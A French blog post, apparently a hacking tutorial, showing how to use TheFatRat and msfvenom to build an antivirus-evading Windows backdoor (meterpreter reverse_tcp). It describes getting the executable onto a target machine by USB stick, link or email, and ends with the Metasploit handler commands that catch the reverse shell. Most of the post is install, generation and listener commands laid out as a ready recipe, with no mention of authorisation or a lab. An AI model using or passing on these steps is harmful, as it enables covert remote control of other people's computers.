Hey ! what’s up guys ? All is right ?

Un comeback sur de la pratique ! je vais vous montrer comment créer un fichier malveillant permettant d’obtenir un accès sur une machine Windows 10 en utilisant un outil fort sympathique et le Framework Metasploit !

 

 

Introduction

TheFatRat est un outil simple pour générer une porte dérobée (backdoor) avec msfvenom (qui fait partie du Framework Metasploit). Le programme compile en C avec un payload meterpreter reverse_tcp qui peut ensuite être exécuté par un .exe sur un hôte Windows qui sera contourné par la plupart des anti-virus. J’ai aussi la possibilité de choisir d’autres programmes en fonction de mon hôte (Linux, Mac, Android…).

 

 

Installation

Tout d’abord, pour installer TheFatRat je tape la commande suivante sur le terminal :

git clone https://github.com/Screetsec/TheFatRat.git

 

Une fois le clonage terminé, je me déplace vers le répertoire en question puis je donne les droits d’exécution au fichier setup.sh :

cd TheFatRat

chmod +x setup.sh && ./setup.sh

 

Pour ceux qui ont des erreurs durant cette phase, pas de panique ! il vous suffit d’utiliser la commande suivante afin d’y remédier :

sudo apt install mingw-w64

Après la configuration terminée je tape la commande ./fatrat et j’obtiens ce qui suit :

Cool !! tout est bien installé.

 

 

Configuration

Bon, il me propose plusieurs options selon mes besoins. Pour commencer je sélectionne l’option 1 qui consiste à créer une porte dérobée avec msfvenom :

 

Maintenant il me demande de choisir le format de mon backdoor selon mes exigences. Vu que je veux exploiter une machine Windows 10, je vais créer un exécutable Windows en sélectionnant l’option 2 :

 

Mon choix étant fait, il va vouloir quelques renseignements supplémentaires pour préparer mon fichier :

  • L’ adresse IP LHOST ( de ma machine hôte)
  • LPORT (le port d’écoute sur lequel je souhaite établir une connexion inversée)
  • Le payload

 

Une fois tous ces éléments fournis, je peux voir ce qui suit :

 

Puis je quitte le script en tapant la touche Entrée, il m’indique le chemin qui contient mon fichier.

Je vais vérifier si mon backdoor est bien présent sur ma machine local :

 

Je copie ce fichier sur mon répertoire /home :

cp FatRat.exe /home

 

Voilà, c’est prêt !

Ce n’est pas terminé, il faut que j’emploie n’importe quelle manière pour introduire mon fichier FatRat.exe sur la machine cible ( exemple : clé USB, lien, mail…).

 

 

Exploitation

Après avoir réussi à placer mon backdoor, depuis ma machine hôte (Parrot OS) je lance Metasploit puis paramétre l’exploit que je vais utiliser : toujours depuis un terminal Linux

 

msfconsole -q

use exploit/multi/handler

set payload windows/meterpreter/shell_reverse_tcp

set lhost 192.168.1.164

set lport 443

exploit

Super !!! j’ai obtenu mon shell meterpreter, un petit sysinfo pour vérifier que c’est bien opérationnel et le tour est joué.

 

Conclusion

C’est la fin de cet article les amis, encore une fois un plaisir de vous partager un maximum de connaissances et de pratiques. J’espère que cette petite démo vous a plu, n’hésitez pas à tester depuis chez vous.

N’oubliez pas : c’est en pratiquant que vous progresserez !

Je reste à votre écoute si vous rencontrez un problème, à très vite pour un prochain article.

Peace 😉 !!  

No responses yet

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.

douze + 9 =

Follow by Email
YouTube